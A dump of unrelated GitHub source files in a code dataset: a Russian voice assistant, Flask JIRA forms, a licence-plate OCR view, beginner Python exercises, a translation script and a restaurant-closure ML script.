tts.getProperty('voices')\r\nNumberOfHelper = len(voices)\r\n\r\n#Поиск голосового пакета Татьяна\r\ni = 0\r\nwhile i < NumberOfHelper:\r\n if 'Tatyana RSI' in voices[i].id:\r\n print(voices[i].id)\r\n tts.setProperty('voice', voices[i].id)\r\n i += 1\r\n\r\n#Приветствие голосового помошника\r\nassistantGreeting = \"Привет! Меня зовут Лили'т! Чем я' могу' , вам помо'чь? \"\r\ntts.say( assistantGreeting )\r\ntts.runAndWait()\r\n\r\n#Фразы, чтобы позвать помошника, или \"отпустить\"\r\nreleaseAssistant = ['лилит', 'лилия', 'лиля', 'ли ли', 'лил', 'лилии', 'лилию', 'вернись',\r\n 'ли вернись', 'ли ты где', 'бот', 'робот', 'робот', 'комп', 'компьютер' ]\r\ncallAssistant = [ 'пока', 'уйди', 'спасибо ты не нужна', 'скройся', 'исчезни', 'ты не нужна', \r\n'давай потом', 'затихни', 'тихо', 'жди', 'ожидай','режим ожидания', 'ожидание' ,\r\n'протокол ждун', 'режим ждун', 'запустить режим ждун', 'режим жди', 'ждун', 'стать ждуном',\r\n'будь ждуном', 'ты ждун', 'обожди', 'жди меня', 'помолчи','испарись'\r\n'протокол ожидание', 'запустить протокол ожидания', 'запустить режим ожидания','всё' ]\r\n\r\nstartlisteningMode=\"0\"\r\n\r\n#функция говорения помощника через питон, звук воспроизводится на компьюторе\r\n#не подходит для решений, где хотелось бы слышать ответы через телефон\r\ndef assistantSays(text):\r\n tts.say( text )\r\n tts.runAndWait()\r\n\r\n#Класс для поиска решений Ассистентом \r\nclass findSolution():\r\n\r\n def __init__(self, text): \r\n self.__querval = text \r\n \r\n def findAnswer(self):\r\n\r\n dirQuervals = {\r\n 'https://vk.com/feed': [ 'открой вк' , 'открой vk' ] ,\r\n 'https://vk.com/im?v=' : [ 'открой сообщения' ] ,\r\n 'https://www.youtube.com/' : [ 'открой ютуб' ,'открой youtube' ] ,\r\n 'C:\\Program Files (x86)\\Bandicam\\Loader.exe' : [ 'открой bandicam' , 'запись экрана'] ,\r\n 'https://sber-zvuk.com/playlists' : [ 'не знаю что послушать' ] ,\r\n 'https://sber-zvuk.com/genres' : [ 'открой категории' ] ,\r\n 'https://www.google.com/search?q=' : [ 'фильм', 'сериал' , 'аниме' ] ,\r\n 'https://sber-zvuk.com/search?query=' : [ 'найди музыку' ] ,\r\n 'https://www.google.com/search?q=' : [ 'найти на google' , 'найти на гугл' ] ,\r\n 'https://www.youtube.com/results?search_query=' : [ 'найти на youtube' , 'найти на ютуб'] ,\r\n 'https://sber-zvuk.com/genre/hiphop': [ \"хочу хип-хоп\" , \"хочу хипхоп\" , \"хочу хип хоп\" ] ,\r\n 'https://sber-zvuk.com/genre/relax' : [ \"хочу отдых\" ] ,\r\n 'https://sber-zvuk.com/genre/party' : [ \"хочу вечеринку\"] ,\r\n 'https://sber-zvuk.com/genre/pop' : [ \"хочу попсу\"] ,\r\n 'https://sber-zvuk.com/genre/sport' : [ \"хочу тренировку\", \"хочу зарядку\", \"хочу спорт\"] ,\r\n 'https://sber-zvuk.com/genre/rock' : [ \"хочу рок\" , \"рок\" , \"хочу rock\" , \"rock\" ] ,\r\n 'https://sber-zvuk.com/genre/motivation' : [ 'хочу мотивацию' , \"мотивацию\" , \"мотивация\" ] ,\r\n 'https://sber-zvuk.com/genre/melancholy' : [ 'хочу меланхолию' , \"хочу погрустить\" ] ,\r\n 'https://sber-zvuk.com/genre/travel' : [ 'хочу путешестовать' , 'хочу в путешествие' ] \r\n }\r\n\r\n for answer, quervals in dirQuervals.items():\r\n if self.__querval in quervals:\r\n return answer\r\n return \"\"\r\n \r\n def helpUser( self, Querval , text ): \r\n print(Querval)\r\n solution = \"\"\r\n dirSolution = {\r\n 'disk' : [ 'D:' , 'C:' ] ,\r\n 'url' : 'http' ,\r\n } \r\n \r\n for answer, solutions in dirSolution.items():\r\n for i in range(len(solutions)):\r\n if solutions[i] in Querval:\r\n solution = answer\r\n \r\n if ( solution=='url' ): \r\n songAppearance.play()\r\n songExecutes.play()\r\n webbrowser.open_new(Querval)\r\n\r\n if 'хочу' in text:\r\n time.sleep(6)\r\n pag.click()\r\n time.sleep(2)\r\n pag.press('space')\r\n time.sleep(2)\r\n tts.say('Надеюсь вам понравиться!')\r\n eel.call_in_py('Надеюсь вам понравиться!')\r\n tts.runAndWait()\r\n\r\n\r\n if ( solution =='disk'):\r\n songAppearance.play()\r\n songExecutes.play()\r\n subprocess.Popen(Querval)\r\n\r\n\r\n\r\ndef record_volume(listeningMode):\r\n r = sr.Recognizer()\r\n with sr.Microphone(device_index = 1) as source:\r\n print('Настраиваюсь.')\r\n r.adjust_for_ambient_noise(source, duration=1)\r\n\r\n print('Слушаю...')\r\n audio = r.listen(source)\r\n try:\r\n query = r.recognize_google(audio, language = 'ru-RU')\r\n text = query.lower()\r\n\r\n\r\n if text in callAssistant:\r\n print('off')\r\n num_rand = random.randint(-1000000, 1000000)\r\n\r\n eel.call_in_py3(text)\r\n eel.call_in_py('Хорошо..')\r\n #tts.say('Хорошо...')\r\n tts.save_to_file('Хорошо...', \"./web/audio/answer\" + str(num_rand) + \".mp3\" )\r\n tts.runAndWait()\r\n listeningMode=\"off\";\r\n\r\n if text in releaseAssistant:\r\n \r\n print('on')\r\n num_rand = random.randint(-1000000, 1000000)\r\n\r\n eel.call_in_py3(text)\r\n #tts.say('Да, господин! Вам.. Что-то нужно? ')\r\n tts.save_to_file('Да, господин! Что нужно?', \"./web/audio/answer\" + str(num_rand) + \".mp3\" )\r\n tts.runAndWait()\r\n listeningMode=\"on\";\r\n\r\n if (listeningMode == 'on'):\r\n if text in releaseAssistant:\r\n print('Вы позвали лилит')\r\n else:\r\n print(f'Вы сказали: {query.lower()}')\r\n eel.call_in_py3(text)\r\n \r\n objectSolution = findSolution(text)\r\n Querval = objectSolution.findAnswer()\r\n objectSolution.helpUser(Querval, text)\r\n \r\n except:\r\n if listeningMode == 'on' and startlisteningMode == 'on' : \r\n tts.say('Ой, я не поняла.')\r\n eel.call_in_py('Ой, я не поняла.')\r\n tts.runAndWait()\r\n\r\n #print(listeningMode)\r\n newlisteningMode= listeningMode\r\n return newlisteningMode\r\n\r\n@eel.expose\r\ndef text_talk(text):\r\n if text in callAssistant:\r\n print('off')\r\n #tts.say('Хорошо...')\r\n num_rand = random.randint(-1000000, 1000000)\r\n\r\n tts.save_to_file('Хорошо...', \"./web/audio/answer\" + str(num_rand) + \".mp3\" )\r\n eel.call_in_py('Хорошо...', num_rand)\r\n tts.runAndWait()\r\n\r\n\r\n if text in releaseAssistant:\r\n print('on')\r\n \r\n num_rand = random.randint(-1000000, 1000000)\r\n \r\n tts.save_to_file('Да, господин! Что нужно?', \"./web/audio/answer\" + str(num_rand) + \".mp3\" )\r\n eel.call_in_py('Да, господин! Вам.. Что-то нужно? ', num_rand)\r\n #tts.say('Да, господин! Вам.. Что-то нужно?')\r\n tts.runAndWait()\r\n\r\n objectSolution = findSolution(text)\r\n Querval = objectSolution.findAnswer()\r\n objectSolution.helpUser(Querval, text)\r\n \r\n return 0\r\n\r\n@eel.expose\r\ndef call_in_js(x):\r\n print(x)\r\n\r\n@eel.expose\r\ndef call_in_Li(x):\r\n print(x)\r\n\r\n@eel.expose\r\ndef test_on_off(x):\r\n startlisteningMode = x\r\n if startlisteningMode==\"on\":\r\n songAppearance.play()\r\n if startlisteningMode==\"off\":\r\n songDisappearance.play()\r\n print(x)\r\n return startlisteningMode\r\n\r\ndef my_other_thread1():\r\n listeningMode=\"on\"\r\n while True:\r\n startlisteningMode = eel.call_in_py2()()\r\n if startlisteningMode==\"on\":\r\n listeningMode = record_volume(listeningMode)\r\n\r\n\r\n#eel.call_in_py(\"Test Py\")\r\neel.spawn(my_other_thread1)\r\neel.start(\"helper.html\", size = (1920,1080), blocking= False)\r\n","repo_name":"markgrig/vois_helper","sub_path":"Talk.py","file_name":"Talk.py","file_ext":"py","file_size_in_byte":10457,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9274362737","text":"import textwrap\n\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField\nfrom wtforms.validators import Required\nfrom ...models import Project, JIRAIssueType, JIRAParentIssue, JIRAMember,\\\n SubscribedJIRAProject, SubscribedJIRAIssue\n\n\nclass NewForm(FlaskForm):\n \"\"\"Form for creating a subscribed_jira_item.\"\"\"\n issue_key = StringField(\n 'Issue Key',\n description=textwrap.dedent(\n \"\"\"\n The key of a JIRA issue associated with the subscribed JIRA project\n (leave empty for a non-subtask issue)\n \"\"\"\n )\n )\n issue_type_name = StringField(\n 'Issue Type',\n description=textwrap.dedent(\n \"\"\"\n The name of the issue type for JIRA issues to be created under this\n subscribed item (defaults to `Sub-task` or `Subtask` if no JIRA issue is\n specified)\n \"\"\"\n )\n )\n jira_id = StringField(\n 'JIRA Member ID',\n description=textwrap.dedent(\n \"\"\"\n An optional field to specify the JIRA ID for a member to be\n automatically assigned to any JIRA Issues created on this list\n \"\"\"\n )\n )\n submit = SubmitField('Create')\n\n def __init__(self, project_key, repo_id):\n \"\"\"Sets the `project_key` for the form.\"\"\"\n FlaskForm.__init__(self)\n self._project_key = project_key\n self._repo_id = repo_id\n\n def validate(self):\n \"\"\"Performs validations of the form field values.\n\n - Validates the `issue_key` attribute is a `JIRAParentIssue.jira_issue_key`\n belonging to the `Project` with `project_key`.\n - Validates the `jira_member_id `attribute belongs to a\n `JIRAMember`\n \"\"\"\n issue_key = self.issue_key.data.strip()\n jira_id = self.jira_id.data.strip()\n issue_type_name = self.issue_type_name.data.strip()\n\n if issue_key:\n jira_issue = JIRAParentIssue.query.filter_by(\n jira_issue_key=issue_key, project_key=self._project_key\n ).first()\n\n if jira_issue is None:\n self._error_message = textwrap.dedent(\n f\"\"\"\n JIRA Issue '{issue_key}' does not exist for project '{self._project_key}'\n \"\"\"\n )\n return False\n\n # Validate the `SubscribedList` does not already exist\n if bool(SubscribedJIRAIssue.query.get(\n [self._project_key, self._repo_id, issue_key]\n )):\n self._error_message = textwrap.dedent(\n f\"\"\"\n Subscribed JIRA issue {issue_key} exists for {self._project_key}, {self._repo_id}\n \"\"\"\n )\n return False\n else:\n if bool(SubscribedJIRAProject.query.get(\n [self._project_key, self._repo_id]\n )):\n self._error_message = textwrap.dedent(\n f\"\"\"\n Subscribed JIRA project exists for {self._project_key}, {self._repo_id}\n \"\"\"\n )\n return False\n\n # Get the `issue_key` to return back to `views.py`\n self._issue_key = issue_key\n\n # `jira_issue_type` is optional only if no SubscribedJIRAProject exists for this subscription\n if not issue_key:\n if not issue_type_name:\n self._error_message = textwrap.dedent(\n f\"\"\"\n JIRA Issue Type required for non-subtask subscriptions\n \"\"\"\n )\n return False\n else:\n project = Project.query.filter_by(key=self._project_key).first()\n for jira_issue_type in JIRAIssueType.query.filter_by(name=issue_type_name):\n if bool(project.issue_types.filter_by(\n issue_type_id=jira_issue_type.issue_type_id)\n ):\n issue_type = jira_issue_type\n break\n if not issue_type:\n self._error_message = textwrap.dedent(\n f\"\"\"\n Issue type {issue_type_name} does not exist for project with key {project.key}\n \"\"\"\n )\n return False\n\n if issue_type.subtask:\n self._error_message = textwrap.dedent(\n f\"\"\"\n Issue type {issue_type_name} for project with key {project.key} is a subtask issue type\n \"\"\"\n )\n return False\n else:\n issue_type = None\n\n self._issue_type = issue_type.issue_type_id if issue_type else None\n\n # `jira_member_id` is optional\n if not jira_id:\n self._jira_member_id = None\n return True\n\n jira_member = JIRAMember.query.filter_by(\n jira_member_id=jira_id\n ).first()\n\n if not bool(jira_member):\n self._error_message = textwrap.dedent(\n f\"\"\"\n JIRA Member '{jira_id}' does not exist\n \"\"\"\n )\n return False\n\n # Get the `jira_member_id` to return back to `views.py`\n self._jira_member_id = jira_member.jira_member_id\n\n # All custom validations passed\n return True\n\n def get_issue_key(self):\n return self._issue_key\n\n def get_issue_type(self):\n return self._issue_type\n\n def get_jira_member_id(self):\n return self._jira_member_id\n\n def get_error_message(self):\n return self._error_message\n\n\nclass UpdateForm(FlaskForm):\n \"\"\"Form for updating an existing subscribed jira item.\"\"\"\n jira_update_id = StringField('JIRA Member ID')\n submit = SubmitField('Update')\n\n def validate(self):\n \"\"\"Performs validations of the form field values.\n\n - Validates the `jira_member_id `attribute belongs to a\n `JIRAMember`\n \"\"\"\n jira_id = self.jira_update_id.data.strip()\n\n # `jira_member_id` is optional\n if not jira_id:\n self._jira_member_id = None\n return True\n\n jira_member = JIRAMember.query.filter_by(\n jira_member_id=jira_id\n ).first()\n\n if not bool(jira_member):\n self._error_message = textwrap.dedent(\n f\"\"\"\n JIRA Member '{jira_id}' does not exist\n \"\"\"\n )\n return False\n\n # Get the `jira_member_id` to return back to `views.py`\n self._jira_member_id = jira_member.jira_member_id\n\n # All custom validations passed\n return True\n\n def get_jira_member_id(self):\n return self._jira_member_id\n\n def get_error_message(self):\n return self._error_message\n\n\nclass DeleteForm(FlaskForm):\n \"\"\"Form for deleting an existing subscribed_list.\"\"\"\n submit = SubmitField('Delete')\n","repo_name":"DataDog/gello","sub_path":"app/controllers/subscribed_jira_items/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":7111,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"31119478829","text":"best_config = {\n \"observation_filter\": \"MeanStdFilter\",\n \"model\": {\"free_log_std\": True},\n \"num_sgd_iter\": 10,\n \"sgd_minibatch_size\": 128,\n \"lambda\": 0.731396,\n \"clip_param\": 0.317651,\n \"lr\": 5e-05,\n \"train_batch_size\": 18812,\n}\n","repo_name":"TrendingTechnology/smart-cities-drl","sub_path":"src/wastenet/ppo.py","file_name":"ppo.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"9609945579","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom accounts.decorators import unauthenticated_user\nfrom accounts.models import *\n\n\n# imports for OenCV and OCR\nimport cv2\nimport pytesseract\nimport matplotlib.pyplot as plt\n\n# Create your views here.\n@login_required(login_url='login')\ndef detectFn(request):\n\n ###############################################\n frameWidth = 640\n frameHeight = 480\n\n new_path = 'F:/UTA Summer 2021/Senior design II/venvir/Lib/site-packages/cv2/'\n nPlateCascade = cv2.CascadeClassifier(new_path + 'data/haarcascade_russian_plate_number.xml')\n minArea = 200\n color = (255,0,255)\n ###############################################\n # cap = cv2.VideoCapture(\"Resources/video12.mp4\") # comment left for rererence \n cap = cv2.VideoCapture(0)\n cap.set(3, frameWidth)\n cap.set(4, frameHeight)\n cap.set(10,150)\n count = 0\n\n while True:\n success, img = cap.read()\n\n # press key 'd' to deactivate the camera/terminate the detection program\n if cv2.waitKey(1) & 0xFF == ord('d'):\n cv2.waitKey(1)\n cv2.destroyAllWindows()\n cv2.waitKey(1)\n messages.success(request,'License detection deactivated.')\n return redirect('dashboard')\n\n # img = cv2.imread('Resources/lena.png') # comment left for rererence \n imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n numberPlates = nPlateCascade.detectMultiScale(imgGray, 1.1, 10)\n for (x, y, w, h) in numberPlates:\n area = w*h\n if area >minArea:\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 255), 2)\n cv2.putText(img,\"Number Plate\",(x,y-5),\n cv2.FONT_HERSHEY_COMPLEX_SMALL,1,color,2)\n imgRoi = img[y:y+h,x:x+w]\n cv2.imshow(\"ROI\", imgRoi)\n\n cv2.imshow(\"Result\", img)\n\n # press key 's' to save the detected license plate\n if cv2.waitKey(1) & 0xFF == ord('s'):\n cv2.imwrite(\"static/scanned/NoPlate_\"+str(count)+\".jpg\",imgRoi)\n cv2.rectangle(img,(0,200),(640,300),(0,255,0),cv2.FILLED)\n cv2.putText(img,\"Scan Saved\",(150,265),cv2.FONT_HERSHEY_DUPLEX,\n 2,(0,0,255),2)\n cv2.imshow(\"Result\",img)\n cv2.waitKey(500)\n\n\n # program segment to read scanned license plates using OCR\n pytesseract.pytesseract.tesseract_cmd = 'F:/UTA Summer 2021/Senior design II/venvir/Lib/site-packages/Tesseract-OCR/tesseract.exe'\n # image_location = '../static/scanned/NoPlate_0.jpg' # comment left for rererence \n image_location = 'static/scanned/NoPlate_'+str(count)+'.jpg'\n ocr_img = cv2.imread(image_location)\n\n predicted_license = pytesseract.image_to_string(ocr_img)\n # predicted_license = pytesseract.image_to_string(ocr_img, lang ='eng',\n # config ='--oem 3 --psm 6 -c tessedit_char_whitelist = ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') # comment left for rererence \n\n filter_predicted_license = \"\".join(predicted_license.split()).replace(\":\", \"\").replace(\"-\", \"\")\n print('\\n')\n print(\"OCR result: \" + predicted_license)\n print(\"Filtered OCR result: \" + filter_predicted_license)\n\n\n try:\n vehicle = Vehicle.objects.get(license_plate = filter_predicted_license)\n print(\"Gate opened and access allowed for vehicle \" + filter_predicted_license + \".\")\n print('\\n')\n\n # TODO\n # Initial parking status:\n print(\"Initial parking status: \" + str(vehicle.parked))\n if vehicle.parked is False:\n vehicle.parked=True\n vehicle.save()\n print('The vehicle [' + filter_predicted_license + '] entered the parking garage.')\n messages.success(request,'The vehicle [' + filter_predicted_license + '] entered the parking garage.')\n \n else:\n vehicle.parked=False\n vehicle.save()\n print('The vehicle [' + filter_predicted_license + '] exited the parking garage.')\n messages.success(request,'The vehicle [' + filter_predicted_license + '] exited the parking garage.')\n\n # Final parking status:\n print(\"Final parking status: \" + str(vehicle.parked)) \n print('\\n') \n\n except ObjectDoesNotExist:\n print(\"Access denied for vehicle \" + filter_predicted_license + \". Please register your vehicle.\")\n print('\\n')\n messages.warning(request,'Access denied for vehicle ' + filter_predicted_license + '. Please register your vehicle.')\n \n\n # increment count for another image\n # since 'detect' url is triggered again at the end of 'detectFn' the increment in count doesn't make any difference(i.e updates NoPlate_0 again and again), however,\n # if any other pages is to be rendered or any other url/function is to be redirected, in that case the same openCv window\n # can be used to detect as many number plates as possible unless the window is terminated\n count +=1\n\n return redirect('detect')\n\n # this code segment has been moved up from here for better performance/easy termination of the detection program\n # # press key 'd' to deactivate the camera/terminate the detection program (this elif condition if put here only works while the rectange has been detected\n # and is in the state of being recognized)\n # elif cv2.waitKey(1) & 0xFF == ord('d'):\n # cv2.waitKey(1)\n # cv2.destroyAllWindows()\n # cv2.waitKey(1)\n # messages.success(request,'License detection deactivated.')\n # return redirect('dashboard')\n\n@login_required(login_url='login')\ndef notificationsFn(request):\n return render(request, 'license/notifications.html')\n","repo_name":"Vyadavgit/ALPR-System-senior-design-project","sub_path":"ALPR_System/license/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6244,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5722406038","text":"from datetime import datetime, timedelta\n\njulAfton = datetime(2021,12,24)\nidag = datetime.now()\ntimespan = julAfton - idag\nprint(f\"Det är {timespan.days} dagar\")\n\ninvoiceDate = datetime.now()\nforFalloDag = invoiceDate + timedelta(days=32)\nprint(forFalloDag.weekday())\nif forFalloDag.weekday() == 5:\n forFalloDag = forFalloDag - timedelta(days=1)\nif forFalloDag.weekday() == 6:\n forFalloDag = forFalloDag + timedelta(days=1)\n\nformattedInvoiceDate = invoiceDate.strftime('%Y-%m-%d')\nprint(f\"Fakturadatum: {formattedInvoiceDate}\")\nformattedForFalloDag = forFalloDag.strftime('%Y-%m-%d')\nprint(f\"Förfallodag: {formattedForFalloDag}\")\n\nwhile True:\n print(\"Skriv in din födelsedag - ex 1972-08-03:\")\n datum = input()\n dat = datetime.strptime(datum, \"%Y-%m-%d\" )\n print(f\"Du är född på en {dat.weekday()}\")\n\nprecisNu = datetime.now()\n#print(precisNu)\n\n#snyggTid = f\"{precisNu.year}-{precisNu.month}-{precisNu.day}\"\nsnyggTid = precisNu.strftime(\"%Y-%m-%d\")\nprint(snyggTid)\n\n\n\nettAnnat = datetime(1972,8,3)\n\n\njagArFoddDettaDatum = datetime(1972,8,3)\nprint(jagArFoddDettaDatum.weekday() )\n\nweekDays = [\"Monday\",\"Tuesday\",\"Wednesday\",\"Thursday\",\"Friday\",\"Saturday\",\"Sunday\"]\n\nprint(weekDays[3])\nprint(weekDays[jagArFoddDettaDatum.weekday()])\n\n\nlista = [12,22,33]\ndc = { \"Namn\":\"Kalle\", \"Adress\":\"Hejgatan12\"}\nprint(dc['Namn'])\n\nidag = datetime.now()\n\nif idag.day != 1:\n print(\"Kör batch\")\n\nprint(idag.year)\nprint(idag.month)\nprint(idag.day)\n#DEBUG OCH SE. Hmmm\n# i denna \"låda\" idag ligger\n# det massa delar inte som lista/dictionary\n#utan på ett tredje sätt. What???\n#Hello OOP ;)\nprint(idag)","repo_name":"aspcodenet/PythonDateDemo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8633628953","text":"petStore = [\n {'pet': 'dog', 'qty': 10},\n {'pet': 'cat', 'qty': 5},\n {'pet': 'bird', 'qty': 3}\n]\n\npet = input('Enter a pet:')\n\nindex = 0\n\nwhile index < len(petStore):\n item = petStore[index]\n # check the pet name\n if item['pet'] == pet:\n print(f\"The petStore has {item['qty']} {item['pet']}(s)\")\n found_it = True\n break\n\n index += 1\nelse:\n qty = int(input(f'Enter the qty for {pet}:'))\n petStore.append({'fruit': pet, 'qty': qty})\n print(petStore)\n ","repo_name":"Achyut-Labs/python-seva","sub_path":"class-7/whileelseDurva 2.Py","file_name":"whileelseDurva 2.Py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"31401831946","text":"# -*- coding: utf-8 -*-\r\n'''\r\n# Created on Mar-17-20 09:22\r\n# translateContent.py\r\n# @author: Lucius\r\n'''\r\nimport os, django, sys\r\nsys.path.append(os.path.dirname(os.path.abspath('.')))\r\nos.environ['DJANGO_SETTINGS_MODULE'] = 'translate.settings'\r\ndjango.setup()\r\nimport requests\r\nimport json\r\n\r\nfrom spiderAndTranslate.models import UserProfile, OriginalBooks, OriginalBooksContent, TanslationBookContentVI, TranslationBooksVI\r\nfrom spiderAndTranslate.utils.baiduTranslateVn import BaiduTranslation\r\n\r\n\r\nbooks_vi = TranslationBooksVI.objects.all()\r\n\r\nfor book_vi in books_vi:\r\n book_content = OriginalBooksContent.objects.filter(book = book_vi.book)\r\n existed_book = TanslationBookContentVI.objects.filter(book = book_vi)\r\n if existed_book:\r\n print (\"It is an existed book\")\r\n else:\r\n if book_content:\r\n try:\r\n for content in book_content:\r\n book_content_vi = TanslationBookContentVI()\r\n book_content_vi.book = book_vi\r\n print(content.chapter_name)\r\n book_content_vi.chapter_name = BaiduTranslation(content.chapter_name, 'zh', 'vie').translate()\r\n print(BaiduTranslation(content.chapter_name, 'zh', 'vie').translate())\r\n book_content_vi.chapter_index = content.chapter_index\r\n book_content_vi.chapter_content = BaiduTranslation(content.chapter_content, 'zh', 'vie').translate()\r\n book_content_vi.words = content.words\r\n book_content_vi.save()\r\n except:\r\n print(\"book_id:\" + book_vi.book_name + \";\" + \"book_index:\" + book_content_vi.chapter_index)\r\n print(\"save error\")","repo_name":"a69186005/fiction_website","sub_path":"translate/utils/translateContentVn.py","file_name":"translateContentVn.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5843057985","text":"import heapq\ndef solution(jobs): #[[0, 3], [1, 9], [2, 6]]\n answer = 0\n end, i = 0, 0\n start = -1\n hq = []\n while len(jobs) > i:\n for job in jobs:\n if start< job[0] <= end:\n heapq.heappush(hq, (job[1], job[0])) # 3, 0\n print(\"hq\", hq)\n if len(hq) > 0:\n now = heapq.heappop(hq)\n print(\"now\", now)\n start = end\n print(start)\n end = end + now[0]\n print(end)\n answer = answer + (end-now[1])\n i = i + 1\n else:\n end = end + 1\n answer = answer // len(jobs)\n return answer\nsolution([[0, 3], [1, 9], [2, 6]])","repo_name":"profitjean/algorithm_training","sub_path":"Programmers/디스크 컨트롤러.py","file_name":"디스크 컨트롤러.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42797632324","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier, \\\n AdaBoostClassifier, GradientBoostingClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import roc_curve, auc\nimport matplotlib.pyplot as plt\nfrom collections import Counter\nimport os\npd.set_option('display.max_columns', 200)\npd.set_option('display.max_rows', 500)\n\n\ndef rf_best_features(df, x_cols, n_features, true_col='closed_on_google'):\n '''\n INPUT: dataframe, input columns, number of top features to return,\n and optionally the name of the target column\n OUTPUT: a tuple of the top N features and their corresponding values\n '''\n\n x_columns = df[x_cols]\n\n y_true = df[true_col]\n\n rf_model = RandomForestClassifier(n_estimators=100)\n\n rf_model.fit(x_columns, y_true)\n\n feature_importances = {}\n\n for i in range(len(rf_model.feature_importances_)):\n\n feature_importances[x_columns.columns[i]] = rf_model.feature_importances_[i]\n\n top_features = Counter(feature_importances).most_common(n_features)\n\n values = [feature[1] for feature in top_features]\n\n features = [feature[0] for feature in top_features]\n\n return values, features\n\n\ndef plot_roc(model, x_columns, y_true, title=\"model type\"):\n '''\n INPUT: fitted model, array of x values, array of target values, optional:\n title of outputted figure\n OUTPUT: ROC curve with AUC value\n '''\n\n y_pred = model.predict_proba(x_columns)\n\n fpr, tpr, threshold = roc_curve(y_true, y_pred[:, 1])\n area_under_curve = auc(fpr, tpr)\n\n # method I: plt\n fig, ax = plt.subplots()\n if title == \"model type\":\n model_name = str(type(model)).split('.')[-1].strip(\">\\'\")\n else:\n model_name = title\n\n plt.title(f'{model_name} ROC')\n ax.plot(fpr, tpr, 'k', label='C AUC = %0.3f' % area_under_curve)\n\n ax.legend(loc='lower right')\n ax.plot([0, 1], [0, 1], 'r--')\n plt.xlim([0, 1])\n plt.ylim([0, 1])\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.savefig(f'../plots/{model_name} ROC')\n plt.close()\n\n\ndef get_best_features(model, x_cols, n_features):\n '''\n INPUT: fitted model, list of all x columns in model, number of features\n to return\n OUTPUT: tuple of top N features and their associated values\n '''\n\n feature_importances = {}\n\n for i in range(len(model.feature_importances_)):\n\n feature_importances[x_cols[i]] = model.feature_importances_[i]\n\n top_features = Counter(feature_importances).most_common(n_features)\n\n values = [feature[1] for feature in top_features]\n\n features = [feature[0] for feature in top_features]\n\n return values, features\n\n\ndef plot_best_features(values, features, name, n_features=10, figsize_x=10, figsize_y=10):\n '''\n INPUT: list of values, list of features, name/title of plot, optional:\n number of features, x and y size of the figure\n title of outputted figure\n OUTPUT: ROC curve with AUC value\n '''\n\n values = values[:n_features]\n\n features = features[:n_features]\n\n new_df = pd.DataFrame(list(zip(values, features))).set_index(1).sort_values(0)\n\n plot = new_df.plot.barh(figsize=(figsize_x, figsize_y), fontsize=100, title=name)\n plot.title.set_size(100)\n fig = plot.get_figure()\n\n fig.savefig(f'../plots/{name}')\n\n\nif __name__ == '__main__':\n if not os.path.exists('../plots'):\n os.makedirs('../plots')\n print(\"Plots folder created.\")\n\n try:\n df = pd.read_json('../data/featurized_dataframe.json')\n print(\"Dataframe read from local .json\")\n except ValueError:\n print(\"Dataframe json being read from s3. Consider running \\'featurize.py\\' first if you'll be running this\\\n multiple times.\")\n df = pd.read_json(\n 'https://s3-us-west-2.amazonaws.com/businesspredictiondata/featurized_dataframe.json')\n\n yelp_basic = ['restaurant_count', 'restaurant_count > 1', 'restaurant_count > 5',\n 'restaurant_count > 25', 'review_count', 'stars']\n\n yelp_categories = [col for col in df.columns if col.startswith('Category')]\n\n yelp_attributes = [col for col in df.columns if col.startswith('Attribute')]\n\n yelp_review_prefixes = ('one_star', 'two_to_four_star', 'five_star')\n yelp_review_features = [col for col in df.columns if col.startswith(yelp_review_prefixes)]\n top_yelp_review_features = rf_best_features(df, yelp_review_features, 100)[1]\n\n all_yelp_columns = yelp_basic + yelp_attributes + yelp_categories + top_yelp_review_features\n\n google_maps_nearby_columns = ['avg_price_level', 'avg_rating', 'num_nearby_restaurants', 'relative rating',\n 'price_level', 'relative_price']\n\n census_columns = ['2016 ACS 5-Year Population Estimate',\n 'American Indian and Alaska Native alone',\n 'Asian alone',\n 'Black or African American alone',\n 'Census 2010 Total Population',\n 'Educational Attainment: Percent high school graduate or higher',\n 'Foreign Born Population',\n 'Hispanic or Latino (of any race)',\n 'Individuals below poverty level',\n 'Median Age',\n 'Median Household Income',\n 'Native Hawaiian and Other Pacific Islander alone',\n 'Some Other Race alone',\n 'Total housing units',\n 'Two or More Races',\n 'Veterans',\n 'White alone']\n\n info_columns = ['name', 'city', 'state', 'postal_code', 'address',\n 'business_id', 'latitude', 'longitude', 'neighborhood']\n\n all_columns = all_yelp_columns + google_maps_nearby_columns + census_columns\n\n print(\"Column groups created\")\n\n x_column_sets = {'Yelp Basic': yelp_basic, 'Yelp Categories': yelp_categories,\n 'Yelp Attributes': yelp_attributes, 'Top Yelp Review': top_yelp_review_features,\n 'Google Maps Nearby': google_maps_nearby_columns, 'All Yelp': all_yelp_columns,\n 'Census - Economic Data by Zip Code': 